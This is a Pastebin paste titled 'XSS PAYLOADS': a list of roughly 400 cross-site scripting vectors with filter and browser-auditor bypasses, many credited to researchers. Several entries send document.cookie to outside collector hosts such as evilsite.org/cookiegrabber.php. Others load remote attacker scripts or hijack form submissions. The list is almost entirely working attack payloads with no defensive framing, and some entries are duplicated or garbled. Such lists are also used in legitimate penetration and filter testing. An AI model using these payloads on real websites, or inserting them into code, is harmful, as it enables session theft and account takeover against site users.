D3vBl4ck

XSS PAYLOADS

Jan 22nd, 2020
16,700
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <  script > < / script>
  2. &lt
  3. &lt;
  4. &LT
  5. &LT;
  6. <
  7. <<
  8. <<<
  9. "><script>"
  10. <script>alert("XSS")</script>
  11. <<script>alert("XSS");//<</script>
  12. <script>alert(document.cookie)</script>
  13. '><script>alert(document.cookie)</script>
  14. '><script>alert(document.cookie);</script>
  15. ";alert('XSS');//
  16. %3cscript%3ealert("XSS");%3c/script%3e
  17. %3cscript%3ealert(document.cookie);%3c%2fscript%3e
  18. %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
  19. &ltscript&gtalert(document.cookie);</script>
  20. &ltscript&gtalert(document.cookie);&ltscript&gtalert
  21. <xss><script>alert('XSS')</script></vulnerable>
  22. <IMG%20SRC='javascript:alert(document.cookie)'>
  23. <IMG SRC="javascript:alert('XSS');">
  24. <IMG SRC="javascript:alert('XSS')"
  25. <IMG SRC=javascript:alert('XSS')>
  26. <IMG SRC=JaVaScRiPt:alert('XSS')>
  27. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  28. <IMG SRC=`javascript:alert("'XSS'")`>
  29. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  30. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  31. <IMG%20SRC='javasc  ript:alert(document.cookie)'>
  32. <IMG SRC="jav   ascript:alert('XSS');">
  33. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  34. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  35. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  36. <IMG SRC=" &#14;  javascript:alert('XSS');">
  37. <IMG DYNSRC="javascript:alert('XSS')">
  38. <IMG LOWSRC="javascript:alert('XSS')">
  39. <IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
  40. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  41. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  42. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  43. '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
  44. "><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
  45. %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
  46. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  47. '';!--"<XSS>=&{()}
  48. <name>','')); phpinfo(); exit;/*</name>
  49. <![CDATA[<script>var n=0;while(true){n;}</script>]]>
  50. <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
  51. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  52. <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
  53. <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  54. <img language=vbs src=<b onerror=alert#1/1#>
  55. Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'
  56. Reverse 401 basic auth phishing by @jackmasa POC:  
  57. document.domain='com' chrome/safari same domain suffix cross-domain trick.  
  58. Safari empty location bar bug by @jackmasa POC:  
  59. Safari location object pollution tech:  by @kinugawamasato  
  60. Safari URL spoofing about://mmme.me POC:
  61. Opera URL spoofing vuln data://mmme.me by @jackmasa POC:  
  62. Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera  
  63. New dom xss vector xxx.innerHTML=document.title  by @0x6D6172696F
  64. Opera data:message/rfc822 #XSS  by @insertScript
  65. #IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>  
  66. IE cool expression xss <div id="alert(/@0x6D6172696F/)" style="x:expression(eval)(id)">  
  67. Clever webkit xss auditor bypass trick <script?=data:,alert(1)<!--  by @cgvwzq
  68. Bypass IE8 version flash docuemnt object protection  by @jackmasa
  69. Bypass IE all version flash docuemnt object protection  by @gainover1
  70. Bypass IE9 flash docuemnt object protection  by @irsdl
  71. Bypass IE8 flash docuemnt object protection  by @irsdl
  72. New XSS vector (#Opera Specific) <sVg><scRipt %00>prompt&lpar;/@soaj1664ashar/&rpar;​​​​​​​​​​​​​​​​  
  73. IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day  
  74. <iframe srcdoc='&lt;svg/onload=alert(/@80vul/)&gt;'> #chrome  
  75. IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day  
  76. new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri  
  77. <h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox  
  78. <script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=> #IE  
  79. "<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter  @kinugawamasato
  80. Components.lookupMethod(self, 'alert')(1) #firefox  
  81. external.NavigateAndFind(' ',[],[]) #IE #URLredirect  
  82. <?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke
  83. <meta http-equiv=refresh content="0 javascript:alert(1)"> #opera  
  84. <meta http-equiv=refresh content="?,javascript&colon;alert(1)"> #chrome  
  85. <svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript  
  86. setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox  
  87. <svg></ y="><x" onload=alert('@0x6D6172696F')>  #svg
  88. Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera  
  89. URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa
  90. <a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>​  #Chrome #XSS @RSnake
  91. Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com  
  92. Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa  
  93. $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/) #firefox  
  94. Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie);  by @jackmasa
  95. <svg><script>location&equals;&#60&#62javascript&amp;#x3A;alert(1)&#60&#33&#47&#62;</script> #Firefox #JustForFun  
  96. Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>  
  97. <style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>  
  98. <!-- --!><input value="--><body/onload=`alert(/ @jackmasa /)//`">  #IE #XSS
  99. Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it.  
  100. Firefox clipboard-hijack without script and css : http://<img alt="evil/#" width=0 height=0 >  
  101. <![<img src=x:x onerror=`alert(/ @jackmasa /)//`]-->  
  102. #E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes
  103. #vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356
  104. ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')()  
  105. No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe>  
  106. <svg><script>/*&midast;&sol;alert(' @0x6D6172696F ')&sol;&sol;*/</script></svg>​  
  107. #VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]  
  108. if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
  109. <svg><script onlypossibleinopera:-)> alert(1) #opera  by @soaj1664ashar
  110. <![if<iframe/onload=vbs::alert[:]> #IE  by @0x6D6172696F, @jackmasa
  111. <svg><script/XL:href=&VeryThinSpace;data&colon;;;;base64;;;;&comma;&lt;&gt;啊YWx啊lc啊nQ啊oMSk啊=> mix!  #opera by @jackmasa
  112. <! XSS="><img src=xx:x onerror=alert(1)//">  #Firefox #Opera #Chrome #Safari #XSS
  113. document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>')  #IE #XSS
  114. header('Refresh: 0;url=javascript:alert(1)');
  115. <script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">
  116. <a href="data:text/html,<script>eval(name)</script>" target="alert(' @garethheyes @0x6D6172696F ')">click</a>
  117. #CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>
  118. #ES #FF for(location of ['javascript:alert(/ff/)']);
  119. #E4X function::['location']='javascript'':alert(/FF/)'
  120. HTML5 entity char <a href="javas&Tab;cri&NewLine;pt:alert(' @garethheyes ')">test</a>
  121. #Firefox <a href="x:alert(1)" id="test">click</a> <script>eval(test'')</script> by @cgvwzq
  122. <div style="color:rgb(''&#0;x:expression(alert(URL=1))"></div> CSS and CSS :P
  123. toUpperCase XSS document.write('<ı onclıck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</ı>'.toUpperCase())  by @jackmasa
  124. IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356  
  125. aha <script src=>alert(/IE|Opera/)</script>
  126. Opera bug? <img src=//\ onload=alert(1)>  
  127. Use 127.1 no 127.0.0.1  by @jackmasa
  128. IE vector location='&#118&#98&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'  
  129. #jQuery super less-xss,work in IE: $(URL) 6 chars  
  130. #Bootstrap tooltip.js xss  some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap
  131. innerText DOM XSS: innerHTML=innerText  
  132. Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.  
  133. jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')  
  134. IE all version CSRF vector <img lowsrc=//google.com>  
  135. Timing vector <img src=//ixss.sinaapp.com/sleep.php>
  136. Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>">  
  137. IE9 <script/onload=alert(1)></script>
  138. Webkit and FF <style/onload=alert(1)>
  139. Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P
  140. IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')
  141. If you want to share your cool vector, please do not hesitate to let me know :)
  142. ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL
  143. New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F  
  144. #Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes  
  145. JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke
  146. JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr
  147. ß=ss <a href="http://ß.lv">click</a> by @_cweb  
  148. <a href="http://www。example。com">click</a> by @_cweb  
  149. Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes
  150. <a href="http://www﹒example﹒com ">click</a> by @_cweb  
  151. history.pushState([],[],'/xssvector') HTML5 URL spoofing!
  152. Clickjacking with history.forward() and history.back()  by @lcamtuf
  153. Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul
  154. XHTML Entity Hijacking [<!ENTITY nbsp "'">]  by @masa141421356
  155. Firefox <img src=javascript:while([{}]);>
  156. IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115  
  157. Firefox funny vector for(i=0;i<100;) find(); by @garethheyes
  158. IE breaking framebusting vector <script>var location={};</script>
  159. IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script>
  160. Firefox <iframe src=view-source://xxxx.com>; with drag and drop
  161. <button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking
  162. Dangling markup injection <img src='//evil by @lcamtuf
  163. Webkit <iframe> viewsource attribute:  // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
  164. DOM clobbering:<form name=location > clobbered location object on IE.
  165. DOM clobbering:<form name=document><image name=body> clobbered document->body
  166. <isindex formaction=javascript:alert(1)> by @jackmasa
  167. Classic IE backtick DOM XSS: <img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script>
  168. Firefox <a href="https://4294967298915183000">click</a>=>google by @garethheyes
  169. <a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> by @kkotowicz
  170. Opera <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. by @jackmasa
  171. Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88
  172. Webkit and Opera <a href="\/www.google.com/favicon.ico">click</a> by @kkotowicz
  173. FF <a href="//ⓜⓜⓜⓔ︒ⓜⓔ">click</a> url trick by @jackmasa
  174. IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
  175. <i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
  176. <a rel="noreferrer" href="//google.com">click</a> no referrer by @sneak_
  177. FF <img src="jar:!/"> no referrer by @sneak_
  178. No dos expression vector <i style=x:expression(alert(URL=1))> by @jackmasa
  179. <svg><style>*{font-family:'<svg onload=alert(1)>';}</style></svg> by @0x6D6172696F
  180. JSLR( @garethheyes ) challenge result:
  181. @irsdl challenge result:  
  182. <body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> Vbscript XHR by @masa141421356
  183. XML Entity XSS  by @garethheyes
  184. Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa
  185. <style>@import//evil? >>>steal me!<<< scriptless by @garethheyes
  186. IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke
  187. <xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D
  188. <a href="#" onclick="alert(' &#39&#41&#59&#97&#108&#101&#114&#116&#40&#50 ')">name</a> Classic html entity inject vector
  189. A nice opera xss: Put 65535 Bytes before and Unicode Sign  by @insertScript
  190. <iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F
  191. JS Array Hijacking with MBCS encodings ppt  by @hasegawayosuke
  192. <meta http-equiv="refresh" content="0;url=http://good/[>>>inj]&#59url=http://evil/[<<<inj]"> IE6-7 Inject vector by @kinugawamasato
  193. IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes
  194. <svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa
  195. Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F
  196. <meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes
  197. FF <a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> by @0x6D6172696F
  198. <noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non-IE
  199. <svg><script xlink:href="data:,alert(1)"> by @0x6D6172696F
  200. Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne  
  201. <svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa
  202. <math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector by @jackmasa
  203. FF <applet code=javascript:alert('sgl')> by @jackmasa
  204. Nice IE DOM XSS: <div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script>  by LeverOne
  205. <script>RuntimeObject("w*")["window"]["alert"](1);</script> IE a new method get window object! by @s_hskz
  206. <body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> Chrome crazy vector! by @cgvwzq
  207. IE <!-- `<img/src=xx:xx onerror=alert(1)//--!> by @jackmasa H5SC:
  208. <a href="javascript&colon;alert&lpar;1&rpar;">click</a> non-IE
  209. <a href="feed:javascript&colon;alert(1)">click</a> Firefox
  210. <link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute! by @shafigullin
  211. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> works on webkit by @garethheyes
  212. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  213. "><script>alert(0)</script>
  214. <script src=http://yoursite.com/your_files.js></script>
  215. </title><script>alert(/xss/)</script>
  216. </textarea><script>alert(/xss/)</script>
  217. <IMG LOWSRC="javascript:alert('XSS')">
  218. <IMG DYNSRC="javascript:alert('XSS')">
  219. <font style='color:expression(alert(document.cookie))'>
  220. <img src="javascript:alert('XSS')">
  221. <script language="JavaScript">alert('XSS')</script>
  222. [url=javascript:alert('XSS');]click me[/url]
  223. <body onunload="javascript:alert('XSS');">
  224. <script>alert(1);</script>
  225. <script>alert('XSS');</script>
  226. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  227. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
  228. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  229. <script>alert(String.fromCharCode(88,83,83))</script>
  230. <img src=foo.png onerror=alert(/xssed/) />  
  231. <style>@import'javascript:alert("XSS")';</style>  
  232. <? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>  
  233. <marquee><script>alert('XSS')</script></marquee>  
  234. <IMG SRC="jav&#x09;ascript:alert('XSS');">  
  235. <IMG SRC="jav&#x0A;ascript:alert('XSS');">  
  236. <IMG SRC="jav&#x0D;ascript:alert('XSS');
  237. <body onLoad="alert('XSS');"  
  238. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  239. "/></a></><img src=1.gif onerror=alert(1)>
  240. window.alert("Bonjour !");  
  241. <div style="x:expression((window.r==1)?'':eval('r=1;  
  242. alert(String.fromCharCode(88,83,83));'))">  
  243. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>  
  244. "><script alert(String.fromCharCode(88,83,83))</script>  
  245. '>><marquee><h1>XSS</h1></marquee>  
  246. '">><script>alert('XSS')</script>  
  247. '">><marquee><h1>XSS</h1></marquee>  
  248. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
  249. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">  
  250. <script>var var = 1; alert(var)</script>  
  251. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
  252. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>  
  253. <IMG SRC='vbscript:msgbox("XSS")'>  
  254. " onfocus=alert(document.domain) "> <"  
  255. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>  
  256. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS  
  257. perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out  
  258. perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out  
  259. <br size="&{alert('XSS')}">  
  260. <scrscriptipt>alert(1)</scrscriptipt>  
  261. </br style=a:expression(alert())>  
  262. </script><script>alert(1)</script>
  263. <SCRIPT>document.write("XSS");</SCRIPT>  
  264. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?);  
  265. ='><script>alert("xss")</script>
  266. <isindex action="javas&Tab;cript:alert(1)" type=image>
  267. <script?=">"?="http://yoursite.com/xss.js?69,69"></script>  
  268. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>  
  269. ">/XaDoS/><script>alert(document.cookie)</script>
  270. <script>  src="http://www.site.com/XSS.js"></script>  
  271. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>  
  272. src="http://www.site.com/XSS.js"></script>
  273. "><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>  
  274. [color=red width=expression(alert(123))][color]  
  275. <BASE HREF="javascript:alert('XSS');//">  
  276. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<  
  277. "></iframe><script>alert(123)</script>  
  278. <body onLoad="while(true) alert('XSS');">  
  279. '"></title><script>alert(1111)</script>  
  280. </textarea>'"><script>alert(document.cookie)</script>  
  281. '""><script language="JavaScript"> alert('X nS nS');</script>  
  282. </script></script><<<<script><>>>><<<script>alert(123)</script>  
  283. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">  
  284. '></select><script>alert(123)</script>  
  285. '>"><script src = 'http://www.site.com/XSS.js'></script>  
  286. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  287. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  288. <IMG SRC=JaVaScRiPt:alert('XSS')>
  289. <IMG SRC=javascript:alert('XSS')>
  290. <IMG SRC="javascript:alert('XSS');">
  291. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  292. <IMG SRC="jav   ascript:alert('XSS');">
  293. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  294. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  295. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  296. <BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
  297. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  298. <<SCRIPT>alert("XSS");//<</SCRIPT>
  299. <SCRIPT SRC=//ha.ckers.org/.j>
  300. <IMG SRC="javascript:alert('XSS')"
  301. <iframe src=http://ha.ckers.org/scriptlet.html <
  302. ";alert('XSS');//
  303. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  304. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  305. <BODY BACKGROUND="javascript:alert('XSS')">
  306. <IMG DYNSRC="javascript:alert('XSS')">
  307. <IMG LOWSRC="javascript:alert('XSS')">
  308. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  309. <IMG SRC='vbscript:msgbox("XSS")'>
  310. <IMG SRC="livescript:[code]">
  311. <BODY ONLOAD=alert('XSS')>
  312. <BGSOUND SRC="javascript:alert('XSS');">
  313. <BR SIZE="&{alert('XSS')}">
  314. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  315. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  316. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  317. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  318. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  319. <STYLE>@import'javascript:alert("XSS")';</STYLE>
  320. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  321. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  322. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  323. <XSS STYLE="xss:expression(alert('XSS'))">
  324. <XSS STYLE="behavior: url(xss.htc);">
  325. <a <!-- --> href="j&#x61;vascript:&#x61;lert(-1)">hello</a>
  326. <a href="j&#x61;vascript:&#x61;lert(-1)"
  327. <a href="j&#00097;vascript:alert%252831337%2529">Hello</a>
  328. <a <!-- href="j&#x61;vascript:&#x61;lert&#x28;31337&#x29;;">Hello</a>
  329. <img src="http://www.w3schools.com/tags/planets.gif" width="145" height="126" alt="Planets" usemap="#planetmap"><map name="planetmap"><area shape="rect" coords="0,0,145,126" a-=">" href="j&#x61;vascript:&#x61;lert(-1)"></map>
  330. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  331. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  332. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  333. " onhover="j&#x61;vascript:&#x61;lert(-1)"
  334. "><script>alert('test')</script>
  335. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  336. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  337. <IMG SRC="javascript:alert('XSS');">
  338. <IMG SRC=JaVaScRiPt:alert('XSS')>
  339. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  340. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  341. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  342. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  343. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  344. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  345. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  346. <IMG SRC="jav   ascript:alert('XSS');">
  347. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  348. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  349. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  350. <IMG
  351. SRC
  352. =
  353. "
  354. j
  355. a
  356. v
  357. a
  358. s
  359. c
  360. r
  361. i
  362. p
  363. t
  364. :
  365. a
  366. l
  367. e
  368. r
  369. t
  370. (
  371. '
  372. X
  373. S
  374. S
  375. '
  376. )
  377. "
  378. >
  379. <IMG SRC=" &#14;  javascript:alert('XSS');">
  380. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  381. <BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert("XSS")>
  382. <<SCRIPT>alert("XSS");//<</SCRIPT>
  383. <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
  384. <SCRIPT SRC=//ha.ckers.org/.j>
  385. <IMG SRC="javascript:alert('XSS')"
  386. <iframe src=http://ha.ckers.org/scriptlet.html <
  387. <SCRIPT>a=/XSS/
  388. alert(a.source)</SCRIPT>
  389. ";alert('XSS');//
  390. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  391. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  392. <BODY BACKGROUND="javascript:alert('XSS')">
  393. <BODY ONLOAD=alert('XSS')>
  394. <IMG DYNSRC="javascript:alert('XSS')">
  395. <IMG LOWSRC="javascript:alert('XSS')">
  396. <BGSOUND SRC="javascript:alert('XSS');">
  397. <BR SIZE="&{alert('XSS')}">
  398. <LAYER SRC="http://ha.ckers.org/
  399. scriptlet.html"></LAYER>
  400. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  401. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  402. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  403. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  404. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  405. <XSS STYLE="behavior: url(xss.htc);">
  406. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
  407. <IMG SRC='vbscript:msgbox("XSS")'>
  408. <IMG SRC="mocha:[code]">
  409. <IMG SRC="livescript:[code]">
